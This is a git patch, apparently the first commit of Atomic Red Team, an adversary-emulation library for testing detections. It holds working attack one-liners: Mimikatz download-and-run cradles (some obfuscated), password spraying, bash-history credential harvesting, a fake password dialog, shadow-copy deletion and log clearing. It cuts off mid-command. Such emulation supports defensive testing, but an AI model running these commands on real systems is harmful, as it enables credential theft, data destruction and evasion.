From ac8dd2cfecb6e183eb2e0f74e5f76465fcef579c Mon Sep 17 00:00:00 2001 
From: caseysmithrc <30840394+caseysmithrc@users.noreply.github.com> Date: Wed, 11 Oct 2017 10:35:17 -0700 Subject: [PATCH] Initial Commit Initial Checkin --- LICENSE.txt | 22 +++ Linux/Credential_Access/Bash_History.md | 6 + Linux/Linux.md | 21 +++ Linux/Persistence/Cron_Job.md | 6 + Mac/Credential_Access/Bash_History.md | 6 + Mac/Execution/AppleScript.md | 18 +++ Mac/Mac.md | 26 ++++ Mac/Persistence/Cron_Job.md | 6 + README.md | 13 ++ Windows/Collection/Clipboard_Data.md | 16 +++ Windows/Credential_Access/Brute_Force.md | 16 +++ Windows/Credential_Access/Create Account.md | 35 +++++ .../Credential_Access/Credential Dumping.md | 36 +++++ Windows/Defense Evasion/File_Deletion.md | 31 ++++ .../Indicator_Removal_on_Host.md | 13 ++ Windows/Discovery/Account_Discovery.md | 47 ++++++ .../Discovery/File_and_Directory_Discovery.md | 12 ++ Windows/Discovery/Query Registry.md | 46 ++++++ Windows/Discovery/Remote System Discovery.md | 19 +++ .../Discovery/System Information Discovery.md | 16 +++ .../Discovery/System Owner-User Discovery.md | 19 +++ Windows/Execution/Bitsadmin.md | 5 + Windows/Execution/InstallUtil.md | 16 +++ Windows/Execution/PowerShell.md | 68 +++++++++ Windows/Execution/RegsvcsRegasm.md | 22 +++ Windows/Execution/Regsvr32.md | 16 +++ Windows/Execution/Rundll32.md | 13 ++ .../Execution/Trusted_Developer_Utilities.md | 12 ++ .../Windows_Management_Instrumentation.md | 45 ++++++ .../Lateral Movement/Windows Admin Shares.md | 15 ++ .../Windows Remote Management.md | 33 +++++ .../Payloads/AllTheThings/AllTheThingsx64.dll | Bin 0 -> 7168 bytes .../Payloads/AllTheThings/AllTheThingsx86.dll | Bin 0 -> 7168 bytes Windows/Payloads/AllTheThings/Program.cs | 134 ++++++++++++++++++ Windows/Payloads/AllTheThings/test.bat | 18 +++ Windows/Payloads/AppInitInject.reg | 6 + .../COMHijackScripts/AtomicRedTeam.sct | 22 +++ .../Payloads/COMHijackScripts/COMHijack.reg | 23 +++ .../COMHijackScripts/COMHijackCleanup.reg | 5 + Windows/Payloads/COMHijackScripts/test.bat | 3 + 
Windows/Payloads/DllInject/DLLInjection.cs | 84 +++++++++++ Windows/Payloads/DllInject/MessageBox32.dll | Bin 0 -> 8704 bytes Windows/Payloads/DllInject/MessageBox64.dll | Bin 0 -> 10752 bytes Windows/Payloads/InstallUtilBypass.cs | 45 ++++++ Windows/Payloads/MSBuildBypass.csproj | 47 ++++++ Windows/Payloads/RegSvcsRegAsmBypass.cs | 50 +++++++ Windows/Payloads/RegSvr32.sct | 23 +++ .../UACBypass/Invoke-EventVwrBypass.ps1 | 92 ++++++++++++ Windows/Persistence/Accessibility_Features.md | 31 ++++ Windows/Persistence/AppInit_DLLs.md | 24 ++++ Windows/Persistence/Application_Shimming.md | 17 +++ Windows/Persistence/Authentication_Package.md | 5 + .../Change_Default_File_Association.md | 13 ++ .../Component_Object_Model_Hijacking.md | 17 +++ Windows/Persistence/Netsh_Helper_DLL.md | 53 +++++++ Windows/Persistence/Scheduled_Task.md | 9 ++ ...ment_Instrumentation_Event_Subscription.md | 53 +++++++ .../Bypass_User_Account_Control.md | 10 ++ Windows/Privilege Escalation/DLL Injection.md | 17 +++ .../Privilege Escalation/Scheduled Task.md | 34 +++++ Windows/Windows.md | 40 ++++++ 61 files changed, 1550 insertions(+) create mode 100644 LICENSE.txt create mode 100644 Linux/Credential_Access/Bash_History.md create mode 100644 Linux/Linux.md create mode 100644 Linux/Persistence/Cron_Job.md create mode 100644 Mac/Credential_Access/Bash_History.md create mode 100644 Mac/Execution/AppleScript.md create mode 100644 Mac/Mac.md create mode 100644 Mac/Persistence/Cron_Job.md create mode 100644 README.md create mode 100644 Windows/Collection/Clipboard_Data.md create mode 100644 Windows/Credential_Access/Brute_Force.md create mode 100644 Windows/Credential_Access/Create Account.md create mode 100644 Windows/Credential_Access/Credential Dumping.md create mode 100644 Windows/Defense Evasion/File_Deletion.md create mode 100644 Windows/Defense Evasion/Indicator_Removal_on_Host.md create mode 100644 Windows/Discovery/Account_Discovery.md create mode 100644 
Windows/Discovery/File_and_Directory_Discovery.md create mode 100644 Windows/Discovery/Query Registry.md create mode 100644 Windows/Discovery/Remote System Discovery.md create mode 100644 Windows/Discovery/System Information Discovery.md create mode 100644 Windows/Discovery/System Owner-User Discovery.md create mode 100644 Windows/Execution/Bitsadmin.md create mode 100644 Windows/Execution/InstallUtil.md create mode 100644 Windows/Execution/PowerShell.md create mode 100644 Windows/Execution/RegsvcsRegasm.md create mode 100644 Windows/Execution/Regsvr32.md create mode 100644 Windows/Execution/Rundll32.md create mode 100644 Windows/Execution/Trusted_Developer_Utilities.md create mode 100644 Windows/Execution/Windows_Management_Instrumentation.md create mode 100644 Windows/Lateral Movement/Windows Admin Shares.md create mode 100644 Windows/Lateral Movement/Windows Remote Management.md create mode 100755 Windows/Payloads/AllTheThings/AllTheThingsx64.dll create mode 100755 Windows/Payloads/AllTheThings/AllTheThingsx86.dll create mode 100755 Windows/Payloads/AllTheThings/Program.cs create mode 100755 Windows/Payloads/AllTheThings/test.bat create mode 100644 Windows/Payloads/AppInitInject.reg create mode 100755 Windows/Payloads/COMHijackScripts/AtomicRedTeam.sct create mode 100755 Windows/Payloads/COMHijackScripts/COMHijack.reg create mode 100755 Windows/Payloads/COMHijackScripts/COMHijackCleanup.reg create mode 100755 Windows/Payloads/COMHijackScripts/test.bat create mode 100755 Windows/Payloads/DllInject/DLLInjection.cs create mode 100755 Windows/Payloads/DllInject/MessageBox32.dll create mode 100755 Windows/Payloads/DllInject/MessageBox64.dll create mode 100644 Windows/Payloads/InstallUtilBypass.cs create mode 100644 Windows/Payloads/MSBuildBypass.csproj create mode 100644 Windows/Payloads/RegSvcsRegAsmBypass.cs create mode 100644 Windows/Payloads/RegSvr32.sct create mode 100644 Windows/Payloads/UACBypass/Invoke-EventVwrBypass.ps1 create mode 100644 
Windows/Persistence/Accessibility_Features.md create mode 100644 Windows/Persistence/AppInit_DLLs.md create mode 100644 Windows/Persistence/Application_Shimming.md create mode 100644 Windows/Persistence/Authentication_Package.md create mode 100644 Windows/Persistence/Change_Default_File_Association.md create mode 100644 Windows/Persistence/Component_Object_Model_Hijacking.md create mode 100644 Windows/Persistence/Netsh_Helper_DLL.md create mode 100644 Windows/Persistence/Scheduled_Task.md create mode 100644 Windows/Persistence/Windows_Management_Instrumentation_Event_Subscription.md create mode 100644 Windows/Privilege Escalation/Bypass_User_Account_Control.md create mode 100644 Windows/Privilege Escalation/DLL Injection.md create mode 100644 Windows/Privilege Escalation/Scheduled Task.md create mode 100644 Windows/Windows.md diff --git a/LICENSE.txt b/LICENSE.txt new file mode 100644 index 00000000..cad34f8e --- /dev/null +++ b/LICENSE.txt 
@@ -0,0 +1,22 @@ + +The MIT License + +Copyright (c) 2016 Red Canary, Inc. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. diff --git a/Linux/Credential_Access/Bash_History.md b/Linux/Credential_Access/Bash_History.md new file mode 100644 index 00000000..b775a8d3 --- /dev/null +++ b/Linux/Credential_Access/Bash_History.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139) + + + cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt diff --git a/Linux/Linux.md b/Linux/Linux.md new file mode 100644 index 00000000..13651588 --- /dev/null +++ b/Linux/Linux.md 
@@ -0,0 +1,21 @@ +## MITRE ATT&CK Matrix - Linux + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| .bash_profile and .bashrc | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | Application Deployment Software | Command-Line Interface | Audio Capture | Automated Exfiltration | Commonly Used Port | +| Bootkit | Setuid and Setgid | Clear Command History | Brute Force | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media | +| [Cron Job](Persistence/Cron_Job.md) | Sudo | Disabling Security Tools | Create Account | Permission Groups Discovery | Remote File Copy | Scripting | Clipboard Data | Data Encrypted | Connection Proxy | +| Hidden Files and Directories | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Process Discovery | Remote Services | Source | Data Staged | Data Transfer Size Limits | Custom Command and Control Protocol | +| Rc.common | Web Shell | File Deletion | Exploitation of Vulnerability | System Information Discovery | Third-party Software | Space after Filename | Data from Local System | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Redundant Access | | HISTCONTROL | Input Capture | System Network Configuration Discovery | | Third-party Software | Data from Network Shared Drive | Exfiltration Over Command and Control Channel | Data 
Encoding | +| Trap | | Hidden Files and Directories | Network Sniffing | System Network Connections Discovery | | Trap | Data from Removable Media | Exfiltration Over Other Network Medium | Data Obfuscation | +| Valid Accounts | | Indicator Removal from Tools | Private Keys | System Owner/User Discovery | | | Input Capture | Exfiltration Over Physical Medium | Fallback Channels | +| Web Shell | | Indicator Removal on Host | Two-Factor Authentication Interception | | | | Screen Capture | Scheduled Transfer | Multi-Stage Channels | +| | | Install Root Certificate | | | | | | | Multiband Communication | +| | | Masquerading | | | | | | | Multilayer Encryption | +| | | Redundant Access | | | | | | | Remote File Copy | +| | | Scripting | | | | | | | Standard Application Layer Protocol | +| | | Space after Filename | | | | | | | Standard Cryptographic Protocol | +| | | Timestomp | | | | | | | Standard Non-Application Layer Protocol | +| | | Valid Accounts | | | | | | | Uncommonly Used Port | +| | | | | | | | | | Web Service | diff --git a/Linux/Persistence/Cron_Job.md b/Linux/Persistence/Cron_Job.md new file mode 100644 index 00000000..bd2891b4 --- /dev/null +++ b/Linux/Persistence/Cron_Job.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168) + + + echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil diff --git a/Mac/Credential_Access/Bash_History.md b/Mac/Credential_Access/Bash_History.md new file mode 100644 index 00000000..b775a8d3 --- /dev/null +++ b/Mac/Credential_Access/Bash_History.md @@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1139](https://attack.mitre.org/wiki/Technique/T1139) + + + cat ~/.bash_history | grep -e '-p ' -e 'pass' -e 'ssh' > loot.txt diff --git a/Mac/Execution/AppleScript.md b/Mac/Execution/AppleScript.md new file mode 100644 index 00000000..a8d17b59 --- /dev/null +++ b/Mac/Execution/AppleScript.md 
@@ -0,0 +1,18 @@ +# AppleScript + +MITRE ATT&CK Technique: [T1155](https://attack.mitre.org/wiki/Technique/T1155) + +## One-Liners + +### Execute Shell Scripts + + osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &"" + +https://github.com/EmpireProject/Empire + + +### Prompt User for Password (Local Phishing) + + osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' + +http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html diff --git a/Mac/Mac.md b/Mac/Mac.md new file mode 100644 index 00000000..0a178e7f --- /dev/null +++ b/Mac/Mac.md 
@@ -0,0 +1,26 @@ +## MITRE ATT&CK Matrix - Mac + + +| Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | +|------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| +| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | Account Discovery | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port | +| [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | Clear Command History | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media | +| Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy | +| Hidden Files and Directories | Plist Modification | Disabling Security Tools | Credentials in Files | Network Share Discovery | Logon Scripts | Launchctl | Data from Local System | Data Transfer Size Limits | Custom Command and Control Protocol | +| LC_LOAD_DYLIB Addition | Setuid and Setgid | Exploitation of Vulnerability | Exploitation of Vulnerability | Permission Groups Discovery | Remote File Copy | Scripting | Data from Network Shared Drive | Exfiltration Over Alternative Protocol | Custom Cryptographic Protocol | +| Launch Agent | Startup Items | File Deletion | Input Capture | Process Discovery | Remote Services | 
Source | Data from Removable Media | Exfiltration Over Command and Control Channel | Data Encoding | +| Launch Daemon | Sudo | Gatekeeper Bypass | Input Prompt | Remote System Discovery | Third-party Software | Space after Filename | Input Capture | Exfiltration Over Other Network Medium | Data Obfuscation | +| Launchctl | Valid Accounts | HISTCONTROL | Keychain | Security Software Discovery | | Third-party Software | Screen Capture | Exfiltration Over Physical Medium | Fallback Channels | +| Login Item | Web Shell | Hidden Files and Directories | Network Sniffing | System Information Discovery | | Trap | | Scheduled Transfer | Multi-Stage Channels | +| Logon Scripts | | Hidden Users | Private Keys | System Network Configuration Discovery | | | | | Multiband Communication | +| Plist Modification | | Hidden Window | Securityd Memory | System Network Connections Discovery | | | | | Multilayer Encryption | +| Rc.common | | Indicator Removal from Tools | Two-Factor Authentication Interception | System Owner/User Discovery | | | | | Remote File Copy | +| Re-opened Applications | | Indicator Removal on Host | | | | | | | Standard Application Layer Protocol | +| Redundant Access | | LC_MAIN Hijacking | | | | | | | Standard Cryptographic Protocol | +| Startup Items | | Launchctl | | | | | | | Standard Non-Application Layer Protocol | +| Trap | | Masquerading | | | | | | | Uncommonly Used Port | +| Valid Accounts | | Plist Modification | | | | | | | Web Service | +| Web Shell | | Redundant Access | | | | | | | | +| | | Scripting | | | | | | | | +| | | Space after Filename | | | | | | | | +| | | Valid Accounts | | | | | | | | diff --git a/Mac/Persistence/Cron_Job.md b/Mac/Persistence/Cron_Job.md new file mode 100644 index 00000000..bd2891b4 --- /dev/null +++ b/Mac/Persistence/Cron_Job.md 
@@ -0,0 +1,6 @@ +# Bash History + +MITRE ATT&CK Technique: [T1168](https://attack.mitre.org/wiki/Technique/T1168) + + + echo "* * * * * /tmp/evil.sh" > /tmp/persistevil && crontab /tmp/persistevil diff --git a/README.md b/README.md new file mode 100644 index 00000000..f98324c3 --- /dev/null +++ b/README.md @@ -0,0 +1,13 @@ +# atomic-red-team +Small and highly portable detection tests mapped to the Mitre ATT&CK +Framework. + +[Windows MITRE ATT&CK Matrix](Windows/Windows.md) + +[Mac MITRE ATT&CK Matrix](Mac/Mac.md) + +[Linux MITRE ATT&CK Matrix](Linux/Linux.md) + +#### We did not create the MITRE ATT&CK Framework, we just think it is awesome and extensive. + +#### ATT&CK and ATT&CK Matrix are trademarks of The MITRE Corporation diff --git a/Windows/Collection/Clipboard_Data.md b/Windows/Collection/Clipboard_Data.md new file mode 100644 index 00000000..1077bc49 --- /dev/null +++ b/Windows/Collection/Clipboard_Data.md @@ -0,0 +1,16 @@ +# Clipboard Data + +MITRE ATT&CK Technique: [T1115](https://attack.mitre.org/wiki/Technique/T1115) + + + +## cmd + + | clip + clip < readme.txt + +## PowerShell + + echo Get-Process > things.txt + powershell + Get-Clipboard | iex diff --git a/Windows/Credential_Access/Brute_Force.md b/Windows/Credential_Access/Brute_Force.md new file mode 100644 index 00000000..4ce257ed --- /dev/null +++ b/Windows/Credential_Access/Brute_Force.md @@ -0,0 +1,16 @@ +# Brute Force + +MITRE ATT&CK Technique: [T1110](https://attack.mitre.org/wiki/Technique/T1110) + +## net.exe + +### Password Spray + + + net user /domain > DomainUsers.txt + echo "Password1" >> pass.txt + echo "1q2w3e4r" >> pass.txt + +Execute: + + @FOR /F %n in (DomainUsers.txt) DO @FOR /F %p in (pass.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\COMPANYDC1\IPC$ > NUL diff --git a/Windows/Credential_Access/Create Account.md b/Windows/Credential_Access/Create Account.md new file mode 100644 index 00000000..1ede6677 --- /dev/null 
+++ b/Windows/Credential_Access/Create Account.md @@ -0,0 +1,35 @@ +# Create Account + +MITRE ATT&CK Technique: [T1136](https://attack.mitre.org/wiki/Technique/T1136) + +## Net.exe + +Local user add: + + Net user /add Trevor SmshBgr123 + +Add new user to localgroup: + + net localgroup administrators jack /add + +Domain add: + + net user username \password \domain + +Add user to Active Directory: + + dsadd user CN=John,CN=Users,DC=it,DC=uk,DC=savilltech,DC=com -samid John -pwd Pa55word123 + +# Powershell 5.1 + +The following requires [Powershell 5.1](https://www.microsoft.com/en-us/download/details.aspx?id=54616) + +Additional information [here](https://4sysops.com/archives/the-new-local-user-and-group-cmdlets-in-powershell-5-1/) + +## Add User + + New-LocalUser -FullName 'Trevor R.' -Name 'Trevor' -Password SmshBgr ‑Description 'Pwnage account' + +## Create a group + + New-LocalGroup -Name 'Testgroup' -Description 'Testing group' diff --git a/Windows/Credential_Access/Credential Dumping.md b/Windows/Credential_Access/Credential Dumping.md new file mode 100644 index 00000000..22a2221a --- /dev/null +++ b/Windows/Credential_Access/Credential Dumping.md 
@@ -0,0 +1,36 @@ +# Credential Dumping + +MITRE ATT&CK Technique: [T1003](https://attack.mitre.org/wiki/Technique/T1003) + + +## Powershell Mimikatz + +Input: + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +## Gsecdump + +[Gsecdump](https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5) + +Input: + + gsecdump -a + +## Windows Credential Editor + +[Windows Credential Editor](http://www.ampliasecurity.com/research/windows-credentials-editor/) + +Input: + + wce -o output.txt + +Output: + + C:\>wce -o output.txt + WCE v1.2 (Windows Credentials Editor) - (c) 2010,2011 Amplia Security - by Hernan Ochoa (hernan@ampliasecurity.com) + Use -h for help. + + C:\>type output.txt + test:AMPLIALABS:01020304050607080900010203040506:98971234567865019812734576890102 + C:\> diff --git a/Windows/Defense Evasion/File_Deletion.md b/Windows/Defense Evasion/File_Deletion.md new file mode 100644 index 00000000..fd2736af --- /dev/null +++ b/Windows/Defense Evasion/File_Deletion.md @@ -0,0 +1,31 @@ +# File Deletion + +MITRE ATT&CK Technique: [T1107](https://attack.mitre.org/wiki/Technique/T1107) + +## cmd + + del /f filename + rmdir example + +## PowerShell + + Remove-Item –path c:\testfolder –recurse + +## vssadmin + + vssadmin.exe Delete Shadows /All /Quiet + + +## wmic + + wmic shadowcopy delete + +## bcdedit + + bcdedit /set {default} bootstatuspolicy ignoreallfailures + + bcdedit /set {default} recoveryenabled no + +## wbadmin + + wbadmin delete catalog -quiet diff --git a/Windows/Defense Evasion/Indicator_Removal_on_Host.md b/Windows/Defense Evasion/Indicator_Removal_on_Host.md new file mode 100644 index 00000000..635e4f78 --- /dev/null +++ b/Windows/Defense Evasion/Indicator_Removal_on_Host.md 
@@ -0,0 +1,13 @@ +## Indicator Removal on Host + +MITRE ATT&CK Technique: [T1070](https://attack.mitre.org/wiki/Technique/T1070) + +## Wevtutil + +Clear system logs + + wevtutil cl System + +Clear Security logs + + wevtutil cl Security diff --git a/Windows/Discovery/Account_Discovery.md b/Windows/Discovery/Account_Discovery.md new file mode 100644 index 00000000..bfc0c719 --- /dev/null +++ b/Windows/Discovery/Account_Discovery.md @@ -0,0 +1,47 @@ +## Account Discovery + +MITRE ATT&CK Technique: [T1087](https://attack.mitre.org/wiki/Technique/T1087) + + +### Net user and group Enumeration + +Domain Group Enumeration: + + net groups "domain administrators" /domain + +Domain User Enumeration: + + net user /domain + +Local Group Enumeration: + + net localgroup "administrators" + +Local User Enumeration: + + net user + + +## wmic.exe + +### Reconnaissance + +Input: + + wmic useraccount get /ALL + +Input: + + wmic process get caption,executablepath,commandline + +Input: + + wmic qfe get description,installedOn /format:csv + +Input: + + wmic /node:"192.168.0.1" service where (caption like "%sql server (%") + +Input: + + get-wmiobject –class "win32_share" –namespace "root\CIMV2" –computer "targetname" diff --git a/Windows/Discovery/File_and_Directory_Discovery.md b/Windows/Discovery/File_and_Directory_Discovery.md new file mode 100644 index 00000000..23b7aef2 --- /dev/null +++ b/Windows/Discovery/File_and_Directory_Discovery.md @@ -0,0 +1,12 @@ +## File and Directory Discovery + +MITRE ATT&CK Technique: [T1083](https://attack.mitre.org/wiki/Technique/T1083) + +### Directory listing + +Input: + + dir c:\ >> %temp%\download + dir "c:\Documents and Settings" >> %temp%\download + dir "c:\Program Files\" >> %temp%\download + dir d:\ >> %temp%\download diff --git a/Windows/Discovery/Query Registry.md b/Windows/Discovery/Query Registry.md new file mode 100644 index 00000000..4c0747c3 --- /dev/null +++ b/Windows/Discovery/Query Registry.md 
@@ -0,0 +1,46 @@ +## Query Registry + +MITRE ATT&CK Technique: [T1012](https://attack.mitre.org/wiki/Technique/T1012) + + + reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices + reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify + reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit + reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell + reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell + reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce + reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run + +Use the following command (as Administrator) to view the drivers configured to load during startup: + + reg query hklm\system\currentcontrolset\services /s | findstr ImagePath 2>nul | findstr /Ri ".*\.sys$" + + Reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run + +Reference: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order + +Reference: https://blog.cylance.com/windows-registry-persistence-part-1-introduction-attack-phases-and-windows-services + + + + reg save HKLM\Security security.hive (Save security hive to a file) + reg save HKLM\System system.hive (Save 
system hive to a file) + reg save HKLM\SAM sam.hive (Save sam to a file)= + reg add [\\TargetIPaddr\] [RegDomain][ \Key ] + reg export [RegDomain]\[Key] [FileName] + reg import [FileName ] + reg query [\\TargetIPaddr\] [RegDomain]\[ Key ] /v [Valuename!] (you can to add /s for recurse all values ) + +Reference: http://www.handgrep.se/repository/cheatsheets/postexploitation/WindowsPost-Exploitation.pdf + +Reference: https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_Find_Chart.en_us.pdf diff --git a/Windows/Discovery/Remote System Discovery.md b/Windows/Discovery/Remote System Discovery.md new file mode 100644 index 00000000..0bf5ddcf --- /dev/null +++ b/Windows/Discovery/Remote System Discovery.md @@ -0,0 +1,19 @@ +# Remote System Discovery + +MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018) + +### net.exe + + net view /domain + + net view + +### Ping + +Ping Sweep: + + for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i + +### ARP + + arp -a diff --git a/Windows/Discovery/System Information Discovery.md b/Windows/Discovery/System Information Discovery.md new file mode 100644 index 00000000..339cd1a0 --- /dev/null +++ b/Windows/Discovery/System Information Discovery.md @@ -0,0 +1,16 @@ +# Remote System Discovery + +MITRE ATT&CK Technique: [T1082](https://attack.mitre.org/wiki/Technique/T1082) + + +## SystemInfo + +Input: + + systeminfo + +## Reg + +Input: + + reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum diff --git a/Windows/Discovery/System Owner-User Discovery.md b/Windows/Discovery/System Owner-User Discovery.md new file mode 100644 index 00000000..832b2012 --- /dev/null +++ b/Windows/Discovery/System Owner-User Discovery.md 
@@ -0,0 +1,19 @@ +## System Owner/User Discovery + +MITRE ATT&CK Technique: [T1018](https://attack.mitre.org/wiki/Technique/T1018) + +### cmd.exe + + "cmd.exe" /C whoami + +### wmic.exe + + wmic useraccount get /ALL + +### quser + + quser /SERVER:"" + +### qwinsta + + qwinsta.exe" /server: diff --git a/Windows/Execution/Bitsadmin.md b/Windows/Execution/Bitsadmin.md new file mode 100644 index 00000000..ba8b7e37 --- /dev/null +++ b/Windows/Execution/Bitsadmin.md @@ -0,0 +1,5 @@ +## bitsadmin.exe + +Input: + + bitsadmin.exe /transfer /Download http://bit.ly/L3g1tCrad1e Default_File_Path.ps1 diff --git a/Windows/Execution/InstallUtil.md b/Windows/Execution/InstallUtil.md new file mode 100644 index 00000000..3cd2a2ad --- /dev/null +++ b/Windows/Execution/InstallUtil.md @@ -0,0 +1,16 @@ +## InstallUtil + +MITRE ATT&CK Technique: [T1118](https://attack.mitre.org/wiki/Technique/T1118) + +### Execution Examples: + +Input: + + x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + + x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll + +## Test Script + +[InstallUtilBypass.cs](https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/InstallUtilBypass.cs) + diff --git a/Windows/Execution/PowerShell.md b/Windows/Execution/PowerShell.md new file mode 100644 index 00000000..fe138955 --- /dev/null +++ b/Windows/Execution/PowerShell.md 
@@ -0,0 +1,68 @@ +# PowerShell + +MITRE ATT&CK Technique: [T1086](https://attack.mitre.org/wiki/Technique/T1086) + +### Download Mimikatz and Dump credentials + + powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds" + +### Download Mimikatz and Dump credentials + +Just download it: + + (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) + +Minor obfuscation: + + (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() + +All obfuscation: + + Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) + +Mimikatz - Cradlecraft PsSendKeys + + $url='https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty 
